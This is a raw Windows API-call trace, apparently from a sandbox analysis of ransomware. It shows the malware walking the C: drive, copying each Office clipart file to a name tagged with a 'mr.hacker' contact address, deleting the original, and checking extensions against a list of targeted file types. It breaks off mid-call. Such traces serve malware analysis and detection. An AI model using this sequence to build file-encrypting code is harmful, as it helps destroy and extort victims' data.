Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0060.269] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.269] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0060.269] GetLastError () returned 0x0 [0060.269] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xf38, lpOverlapped=0x0) returned 1 [0060.270] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xf40, lpOverlapped=0x0) returned 1 [0060.271] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0060.271] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.272] SetEndOfFile (hFile=0x1c8) returned 1 [0060.272] CloseHandle (hObject=0x1c8) returned 1 [0060.272] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.272] SetEndOfFile (hFile=0x244) returned 1 [0060.273] CloseHandle (hObject=0x244) returned 1 [0060.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf")) returned 1 [0060.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0060.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0060.273] lstrlenW (lpString=".doc") returned 4 [0060.273] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.273] lstrlenW (lpString=".docx") returned 5 [0060.273] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.273] lstrlenW (lpString=".pdf") returned 4 [0060.273] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.273] lstrlenW (lpString=".xls") returned 4 [0060.273] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.273] lstrlenW (lpString=".xlsx") returned 5 [0060.273] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.273] lstrlenW (lpString=".ppt") returned 4 [0060.273] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0060.274] lstrlenW (lpString=".zip") returned 4 [0060.274] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.274] lstrlenW (lpString=".rar") returned 4 [0060.274] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.274] lstrlenW (lpString=".bz2") returned 4 [0060.274] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.274] lstrlenW (lpString=".7z") returned 3 [0060.274] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0060.274] lstrlenW (lpString=".dbf") returned 4 [0060.274] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0060.274] lstrlenW (lpString=".1cd") returned 4 [0060.274] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0060.274] lstrlenW (lpString=".jpg") returned 4 [0060.274] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.274] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=3796) returned 1 [0060.274] CloseHandle (hObject=0x244) returned 1 [0060.274] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf")) returned 0x20 [0060.274] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0060.275] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.275] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0060.277] GetLastError () returned 0x0 [0060.277] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xed4, lpOverlapped=0x0) returned 1 [0060.279] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xee0, lpOverlapped=0x0) returned 1 [0060.280] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0060.280] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.280] SetEndOfFile (hFile=0x1c8) returned 1 [0060.280] CloseHandle (hObject=0x1c8) returned 1 [0060.280] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.280] SetEndOfFile (hFile=0x244) returned 1 [0060.281] CloseHandle (hObject=0x244) returned 1 [0060.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf")) returned 1 [0060.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0060.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0060.281] lstrlenW (lpString=".doc") returned 4 [0060.281] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.281] lstrlenW (lpString=".docx") returned 5 [0060.282] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.282] lstrlenW (lpString=".pdf") returned 4 [0060.282] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.282] lstrlenW (lpString=".xls") returned 4 [0060.282] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.282] lstrlenW (lpString=".xlsx") returned 5 [0060.282] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.282] lstrlenW (lpString=".ppt") returned 4 [0060.282] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0060.282] lstrlenW (lpString=".zip") returned 4 [0060.282] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.282] lstrlenW (lpString=".rar") returned 4 [0060.282] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.282] lstrlenW (lpString=".bz2") returned 4 [0060.282] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.282] lstrlenW (lpString=".7z") returned 3 [0060.282] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0060.282] lstrlenW (lpString=".dbf") returned 4 [0060.282] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0060.282] lstrlenW (lpString=".1cd") returned 4 [0060.282] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0060.282] lstrlenW (lpString=".jpg") returned 4 [0060.282] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.282] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2436) returned 1 [0060.283] CloseHandle (hObject=0x244) returned 1 [0060.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 0x20 [0060.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0060.283] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.283] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0060.283] GetLastError () returned 0x0 [0060.283] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x984, lpOverlapped=0x0) returned 1 [0060.285] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x990, lpOverlapped=0x0) returned 1 [0060.286] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0060.286] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.286] SetEndOfFile (hFile=0x1c8) returned 1 [0060.286] CloseHandle (hObject=0x1c8) returned 1 [0060.286] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.286] SetEndOfFile (hFile=0x244) returned 1 [0060.287] CloseHandle (hObject=0x244) returned 1 [0060.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.287] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 1 [0060.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0060.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0060.288] lstrlenW (lpString=".doc") returned 4 [0060.288] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.288] lstrlenW (lpString=".docx") returned 5 [0060.288] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.288] lstrlenW (lpString=".pdf") returned 4 [0060.288] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.288] lstrlenW (lpString=".xls") returned 4 [0060.288] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.288] lstrlenW (lpString=".xlsx") returned 5 [0060.288] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.288] lstrlenW (lpString=".ppt") returned 4 [0060.288] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0060.288] lstrlenW (lpString=".zip") returned 4 [0060.288] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.288] lstrlenW (lpString=".rar") returned 4 [0060.288] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.288] lstrlenW (lpString=".bz2") returned 4 [0060.288] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.288] lstrlenW (lpString=".7z") returned 3 [0060.288] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0060.288] lstrlenW (lpString=".dbf") returned 4 [0060.288] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0060.288] lstrlenW (lpString=".1cd") returned 4 [0060.288] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0060.288] lstrlenW (lpString=".jpg") returned 4 [0060.288] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.289] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2732) returned 1 [0060.289] CloseHandle (hObject=0x244) returned 1 [0060.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf")) returned 0x20 [0060.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0060.289] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.289] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0060.289] GetLastError () returned 0x0 [0060.289] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xaac, lpOverlapped=0x0) returned 1 [0060.291] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xab0, lpOverlapped=0x0) returned 1 [0060.291] ReadFile (in: hFile=0x244, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0060.292] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.292] SetEndOfFile (hFile=0x1c8) returned 1 [0060.292] CloseHandle (hObject=0x1c8) returned 1 [0060.292] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0060.292] SetEndOfFile (hFile=0x244) returned 1 [0060.293] CloseHandle (hObject=0x244) returned 1 [0060.293] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.293] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf")) returned 1 [0060.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0060.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0060.293] lstrlenW (lpString=".doc") returned 4 [0060.293] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.293] lstrlenW (lpString=".docx") returned 5 [0060.293] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.293] lstrlenW (lpString=".pdf") returned 4 [0060.293] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.293] lstrlenW (lpString=".xls") returned 4 [0060.293] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.293] lstrlenW (lpString=".xlsx") returned 5 [0060.293] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.293] lstrlenW (lpString=".ppt") returned 4 [0060.294] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0060.294] lstrlenW (lpString=".zip") returned 4 [0060.294] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.294] lstrlenW (lpString=".rar") returned 4 [0060.294] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.294] lstrlenW (lpString=".bz2") returned 4 [0060.294] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.294] lstrlenW (lpString=".7z") returned 3 [0060.294] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0060.294] lstrlenW (lpString=".dbf") returned 4 [0060.294] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0060.294] lstrlenW (lpString=".1cd") returned 4 [0060.294] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0060.294] lstrlenW (lpString=".jpg") returned 4 [0060.294] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 14 os_tid = 0x9b4 [0033.099] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3770260 [0033.099] lstrlenW (lpString="C:") returned 2 [0033.099] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2f2fd00 | out: lpFindFileData=0x2f2fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x65e210 [0033.100] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0033.100] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0033.100] lstrlenW (lpString="$Recycle.Bin") returned 12 [0033.100] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0033.100] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3780268 [0033.100] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0033.100] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3790270 [0033.100] FindNextFileW (in: hFindFile=0x3790270, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.100] FindNextFileW (in: hFindFile=0x3790270, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0033.101] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0033.101] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0033.101] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0033.101] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0033.101] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, 